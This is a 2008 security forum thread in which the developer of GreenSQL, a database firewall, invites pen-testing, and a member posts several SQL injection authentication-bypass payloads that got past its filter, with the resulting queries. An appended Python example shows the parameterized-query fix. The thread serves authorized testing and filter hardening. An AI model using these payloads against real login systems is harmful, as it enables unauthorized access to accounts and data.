sla.ckers.org web application security lab forums
Need help from SQL Injection gurus (was: New version of GreenSQL requires pen test)
Posted by: yuli (IP Logged)
Date: September 01, 2008 05:30PM

Hi Guys!!!

I would like to ask all SQL gurus for help. I am running the GreenSQL project. It is an open source database firewall. Some of the forum members successfully cracked the application logic in one of the first application versions. I want you to test the new version.

We are going to release a new production version soon, and it is important to close all SQL injection detection engine workarounds.

Here is the project website: [www.greensql.net]

SQL Injection test page (you need to break into this script): [www.greensql.net]

Demo version (it protects that sql-injection-test page): [demo.greensql.net]

More information regarding new version can be found here: [www.greensql.net]

Thanks,
Yuli



Edited 1 time(s). Last edit at 09/02/2008 03:01AM by yuli.

Re: New version of GreenSQL requires pen test
Posted by: thrill (IP Logged)
Date: September 01, 2008 06:37PM

Quote:
I want you to test the new version.

You might want to edit your post and change the above to "I would like to request your valued help in testing our new version." because the original 'request' sounded more like a demand.

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: New version of GreenSQL requires pen test
Posted by: istari (IP Logged)
Date: September 01, 2008 08:04PM

And now, even if he does edit his original post, thrill has provided us all with an unedited copy of this demand, so we all know how it was phrased before he took politeness classes...

Re: New version of GreenSQL requires pen test
Posted by: thrill (IP Logged)
Date: September 01, 2008 10:42PM

heh.. yeah.. that was somewhat on purpose.. :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

topic changed
Posted by: yuli (IP Logged)
Date: September 02, 2008 03:02AM

I hope it is much better now ;)

Re: Need help from SQL Injection gurus (was: New version of GreenSQL requires pen test)
Posted by: Reiners (IP Logged)
Date: September 02, 2008 09:51AM

You seem to use MySQL, so I guess there are lots of these kinds:

username: \\
password: =(\' AND pwd=SHA(

query: SELECT * FROM user WHERE name = '\' AND pwd=SHA('=('\' AND pwd=SHA(')

Quote:
You had successfully bypassed GreenSQL protection.



Edited 1 time(s). Last edit at 09/02/2008 09:53AM by Reiners.

Re: Need help from SQL Injection gurus (was: New version of GreenSQL requires pen test)
Posted by: Reiners (IP Logged)
Date: September 02, 2008 09:56AM

username: '='
password: ')=SHA('

query: SELECT * FROM user WHERE name = ''='' AND pwd=SHA('')=SHA('')

Quote:
You had successfully bypassed GreenSQL protection.

Re: Need help from SQL Injection gurus (was: New version of GreenSQL requires pen test)
Posted by: Reiners (IP Logged)
Date: September 02, 2008 10:09AM

username: aa'in ('aa') or 1='1
password: ')=SHA('

It's the same trick with the password, but it is not usual that you have to trick quotes AND brackets in one SQL injection. Normally escaping the bracket is sufficient for SQLi.

Have a look at the PHP-IDS thread, there are tons of vectors.

And you might find this article about MySQL syntax useful to harden your filters (also check the 4 examples, I guess they'll work too). The problem is that you can use as many comparisons, variables, constants, brackets, prefixes, whitespaces, mathematics (and so on) as you like and build complex "or 1=1" injections. Also note, as the above vectors have shown, that you don't necessarily need the "or" operator since you can make direct comparisons:
select * from users where name='1'='1' and pass='1'='1'

What I don't like about your test page is that it is
a) quoted query only (most vectors happen to be an integer (e.g. an ID) and no quotes are required)
b) only auth bypass
c) you need to break parentheses and you normally don't need to. That breaks half of the vectors because you filter for comment types, but won't protect customers who use queries without parentheses



Edited 3 time(s). Last edit at 12/19/2008 05:04AM by Reiners.
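As an added example (not code from this thread or from GreenSQL), the Python below rebuilds the demo page's concatenated query for Reiners' second vector, reproducing the query text posted above, and then shows the fix the thread implies: hash in the application and bind both values, so the SQL text never changes and quotes, parentheses and chained comparisons in the input stay plain data. It assumes the demo page concatenates exactly as the posted query suggests; the sqlite3 table and the account are constructed, and the unsafe query is only built, not executed, because SQLite's comparison semantics differ from MySQL's.

```python
import hashlib
import sqlite3


def build_unsafe_query(username: str, password: str) -> str:
    """String concatenation as the demo page appears to do it (assumption
    based on the query text posted in the thread)."""
    return (
        "SELECT * FROM user WHERE name = '" + username
        + "' AND pwd=SHA('" + password + "')"
    )


def make_db() -> sqlite3.Connection:
    """In-memory table with one constructed account; pwd holds the SHA-1
    hex digest, matching what MySQL's SHA() would store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, pwd TEXT)")
    conn.execute(
        "INSERT INTO user VALUES (?, ?)",
        ("alice", hashlib.sha1(b"correct horse").hexdigest()),
    )
    return conn


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hash in the application and bind both values as parameters: the SQL
    text is fixed, so no input can alter the WHERE clause's structure."""
    digest = hashlib.sha1(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT 1 FROM user WHERE name = ? AND pwd = ?", (username, digest)
    ).fetchone()
    return row is not None


# Reiners' second vector from this thread, used as test input.
VECTOR_USER = "'='"
VECTOR_PASS = "')=SHA('"

if __name__ == "__main__":
    print(build_unsafe_query(VECTOR_USER, VECTOR_PASS))
    conn = make_db()
    print("alice / correct password:", login_safe(conn, "alice", "correct horse"))
    print("vector with bound params:", login_safe(conn, VECTOR_USER, VECTOR_PASS))
```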
